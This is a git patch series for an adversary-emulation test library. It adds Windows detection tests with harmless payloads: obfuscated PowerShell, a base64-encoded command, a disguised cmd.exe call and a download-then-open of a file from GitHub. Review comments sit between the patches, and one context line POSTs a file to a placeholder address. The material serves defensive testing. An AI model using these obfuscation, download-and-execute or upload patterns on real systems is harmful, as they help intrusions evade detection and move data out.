From 189ae94750db61ac22eb759d3ecf4bb1b619f56a Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 26 Jul 2021 12:46:41 -0700 Subject: [PATCH 01/11] Update T1027.yaml Added additional obfuscated PowerShell example. --- atomics/T1027/T1027.yaml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 7210e5af..4d5a5c58 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -150,3 +150,15 @@ atomic_tests: command: | Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} name: powershell + +- name: Obfuscated Command in PowerShell + auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f + description: | + This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + executor: + command: | + $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) + name: powershell + From ba20bcd95a9ceb83b3d57511f791528542277326 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 26 Jul 2021 12:52:18 -0700 Subject: [PATCH 02/11] Add obfuscated PowerShell to T1059.001 Additional obfuscated PowerShell example. --- atomics/T1059.001/T1059.001.yaml | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) 
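Review bot: The `description: |` of the new T1027 test says only that the command prints a greeting; for an obfuscation technique the reader needs to know which obfuscation primitives the sample exercises so the right telemetry can be checked against it. I would extend the description with a sentence such as `Obfuscation used: cmdlet and type names rebuilt with -f format strings, backtick-escaped member names, and an octal character-code array decoded via [Convert]::ToInt16(x, 8), all passed to Invoke-Expression; the reassembled Write-Host line is what PowerShell Script Block Logging would be expected to record.` If the console output "Hello, from PowerShell!" is the success criterion, stating that explicitly lets the test be verified rather than merely run.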
diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 23915cf6..096bfbf9 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -374,4 +374,20 @@ atomic_tests: Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' - name: powershell \ No newline at end of file + name: powershell + + - name: PowerShell Command Execution + auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 + description: | + Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + obfuscated_code: + description: 'Defaults to: Invoke-Expression with a "Write-Host" line.' + type: string + default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== + executor: + command: | + powershell.exe -e #{obfuscated_code} + name: command_prompt From 64966be2fd209074f79c720ea481834a432d9f88 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 26 Jul 2021 12:57:10 -0700 Subject: [PATCH 03/11] Add Suspicious Execution to T1059.003 --- atomics/T1059.003/T1059.003.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index cbe28a3f..3c1952e2 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml 
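Review bot: The `obfuscated_code` input argument is documented only by what its default does; nothing tells an operator that `powershell.exe -e` expects the Base64 of a UTF-16LE encoded command (which is what the default decodes as), so a replacement encoded from UTF-8 will not run. I'd change it to `description: 'Base64 of a UTF-16LE encoded PowerShell command, the format powershell.exe -e expects. Defaults to: Invoke-Expression with a "Write-Host" line.'` The new entry also starts at `  - name:` with two extra leading spaces while the surrounding tests appear to start at column 0; patch 05 of this series corrects that. Since the executor is `command_prompt`, the observable is a cmd.exe parent launching powershell.exe with an encoded-command switch, and saying so in the description would make the detection goal of the test explicit.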
@@ -52,3 +52,23 @@ atomic_tests: cleanup_command: | del "#{file_contents_path}" name: command_prompt + +- name: Suspicious Execution via Windows Command Shell + auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + description: | + Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + output_file: + description: File to output to + type: string + default: hello.txt + input_message: + description: Message to write to file + type: string + default: Hello, from CMD! + executor: + command: | + %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file} + name: command_prompt From e8899b4df6d24fb2f8fcc9a93e1e5fb3bdfd384c Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 26 Jul 2021 13:00:42 -0700 Subject: [PATCH 04/11] Additional PowerShell Download in T1105 --- atomics/T1105/T1105.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index c90158a6..7838f6a5 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml 
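Review bot: The new test writes `#{output_file}` but has no `cleanup_command`, unlike the test just above it in the same file, which cleans up with `del "#{file_contents_path}"`, so the file is left behind after every run. I would add `cleanup_command: |` followed by `del "#{output_file}"` under the executor, and quote `#{output_file}` in both the redirection and the `type` call as the existing test does so a path containing spaces still works. The description `Command line executed via suspicious invocation.` does not say what is suspicious: the detection-relevant property is that `%LOCALAPPDATA:~-3,1%md` takes the letter `c` from the variable's value at run time so the literal string `cmd` never appears in the launched command line, and this relies on `LOCALAPPDATA` ending in `Local`, which is worth stating so a failure under a redirected profile is understood.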
@@ -381,3 +381,23 @@ atomic_tests: timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} cleanup_command: | rm -f #{output_file} + +- name: File Download via PowerShell + auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + description: | + Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + target_remote_file: + description: File to download + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt + output_file: + description: File to write to + type: string + default: LICENSE.txt + executor: + command: | + (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} + name: powershell From 0960fca14ee711f0f7e3369970643532afdf4ec5 Mon Sep 17 00:00:00 2001 From: Matt Graeber <60448025+mgraeber-rc@users.noreply.github.com> Date: Tue, 27 Jul 2021 09:47:29 -0400 Subject: [PATCH 05/11] Update T1059.001.yaml Removing extra space in line 379 --- atomics/T1059.001/T1059.001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 096bfbf9..4ab3d989 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml 
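Review bot: The new test leaves `#{output_file}` on disk: there is no `cleanup_command`, while the whois test directly above it removes its output with `rm -f #{output_file}`. I would add `cleanup_command: |` and `Remove-Item #{output_file} -Force -ErrorAction SilentlyContinue` under the executor. `Invoke-Item #{output_file}` also opens the written file with whatever handler is registered for its extension, so the side effect depends entirely on the operator-supplied `output_file` name; the description should say so (e.g. `The downloaded content is then opened with the default handler for the output file's extension.`) so the test is not mistaken for a pure download. Note too that `DownloadString | Out-File` re-encodes the content rather than writing the remote bytes, so the local file is not a byte-for-byte copy; if a faithful transfer is intended, `DownloadFile` is the matching call, though that would change the telemetry the test produces.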
@@ -376,7 +376,7 @@ atomic_tests: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' name: powershell - - name: PowerShell Command Execution +- name: PowerShell Command Execution auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 description: | Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. From d55b5813317428df989de068551269e445e4f175 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 27 Jul 2021 14:42:28 +0000 Subject: [PATCH 06/11] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index bdecd84c..6b256736 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -732,3 +732,4 @@ c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 b8e747c3-bdf7-4d71-bce2-f1df2a057406 a12b5531-acab-4618-a470-0dafb294a87a d400090a-d8ca-4be0-982e-c70598a23de9 +54a4daf1-71df-4383-9ba7-f1a295d8b6d2 From 5956ac532b512b860c7e2e3d719d81b80a87221e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 14:42:34 +0000 Subject: [PATCH 07/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 21 +++++++++++ atomics/T1105/T1105.md | 36 +++++++++++++++++++ 6 files changed, 61 insertions(+) 
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index f2257e0e..5705cb4a 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -860,6 +860,7 @@ command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca617 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh +command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index b338da52..d4703978 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -528,6 +528,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt +command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 21b70104..f96bd50a 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1559,6 +1559,7 @@ - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] - Atomic Test #14: whois file download [linux, macos] + - Atomic Test #15: File Download via PowerShell [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #1: Connection Proxy [macos, linux] - Atomic Test #2: Connection Proxy for macOS UI [macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d85cc21e..dd913c70 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -960,6 +960,7 @@ - Atomic Test #11: OSTAP Worming Activity [windows] - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] + - Atomic Test #15: File Download via PowerShell [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #3: portproxy reg key [windows] - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4f451fdb..6e49e660 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -65221,6 +65221,27 @@ command-and-control: cleanup_command: 'rm -f #{output_file} ' + - name: File Download via PowerShell + auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + description: 'Use PowerShell to download and write an arbitrary file from the + internet. Example is from the 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + target_remote_file: + description: File to download + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt + output_file: + description: File to write to + type: string + default: LICENSE.txt + executor: + command: "(New-Object Net.WebClient).DownloadString('#{target_remote_file}') + | Out-File #{output_file}; Invoke-Item #{output_file}\n" + name: powershell T1090.001: technique: external_references: diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index caef3d08..57e0c326 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -32,6 +32,8 @@ - [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download) +- [Atomic Test #15 - File Download via PowerShell](#atomic-test-15---file-download-via-powershell) +
@@ -589,4 +591,38 @@ echo "Please install timeout and the whois package" +
+
+ +## Atomic Test #15 - File Download via PowerShell +Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_remote_file | File to download | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt| +| output_file | File to write to | string | LICENSE.txt| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} +``` + + + + + +
From 5e1b13f76fd309c4c24d5fa15e8739c2bc831beb Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 27 Jul 2021 14:44:49 +0000 Subject: [PATCH 08/11] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 6b256736..c46cadb2 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -733,3 +733,4 @@ b8e747c3-bdf7-4d71-bce2-f1df2a057406 a12b5531-acab-4618-a470-0dafb294a87a d400090a-d8ca-4be0-982e-c70598a23de9 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 +d0eb3597-a1b3-4d65-b33b-2cda8d397f20 From 1d8ca6c672ef46eb5df3c75adefb334e230637ea Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 14:44:55 +0000 Subject: [PATCH 09/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 21 +++++++++++ atomics/T1059.003/T1059.003.md | 36 +++++++++++++++++++ 6 files changed, 61 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 5705cb4a..617fec9f 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -818,6 +818,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt +execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index d4703978..87b366f5 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -585,6 +585,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt +execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f96bd50a..868bc4f7 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1470,6 +1470,7 @@ - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] - Atomic Test #2: Writes text to a file and displays it. [windows] + - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index dd913c70..3fc9f744 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -1064,6 +1064,7 @@ - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] - Atomic Test #2: Writes text to a file and displays it. [windows] + - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 6e49e660..9f6d2752 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -61581,6 +61581,27 @@ execution: ' name: command_prompt + - name: Suspicious Execution via Windows Command Shell + auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + description: 'Command line executed via suspicious invocation. Example is from + the 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + output_file: + description: File to output to + type: string + default: hello.txt + input_message: + description: Message to write to file + type: string + default: Hello, from CMD! + executor: + command: "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} + & type #{output_file}\n" + name: command_prompt T1047: technique: id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055 diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index 4a96ddef..61786e57 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -12,6 +12,8 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu - [Atomic Test #2 - Writes text to a file and displays it.](#atomic-test-2---writes-text-to-a-file-and-displays-it) +- [Atomic Test #3 - Suspicious Execution via Windows Command Shell](#atomic-test-3---suspicious-execution-via-windows-command-shell) +
@@ -101,4 +103,38 @@ del "#{file_contents_path}" +
+
+ +## Atomic Test #3 - Suspicious Execution via Windows Command Shell +Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | File to output to | string | hello.txt| +| input_message | Message to write to file | string | Hello, from CMD!| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file} +``` + + + + + +
From e2cbd6059651db7cc4d160338150f7345c400d40 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 27 Jul 2021 14:47:07 +0000 Subject: [PATCH 10/11] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index c46cadb2..18f2acca 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -734,3 +734,4 @@ a12b5531-acab-4618-a470-0dafb294a87a d400090a-d8ca-4be0-982e-c70598a23de9 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 d0eb3597-a1b3-4d65-b33b-2cda8d397f20 +a538de64-1c74-46ed-aa60-b995ed302598 From 29a063b40bc2e4b0dbca2965d49eb3cfd040ea90 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 14:47:14 +0000 Subject: [PATCH 11/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 19 ++++++++++ atomics/T1059.001/T1059.001.md | 35 +++++++++++++++++++ 6 files changed, 58 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 617fec9f..0da994fb 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -798,6 +798,7 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell +execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 87b366f5..d65ae1a4 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -571,6 +571,7 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell +execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 868bc4f7..d7882ffa 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1436,6 +1436,7 @@ - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #19: PowerShell Command Execution [windows] - [T1059.006 Python](../../T1059.006/T1059.006.md) - Atomic Test #1: Execute shell script via python's command mode arguement [linux] - Atomic Test #2: Execute Python via scripts (Linux) [linux] 
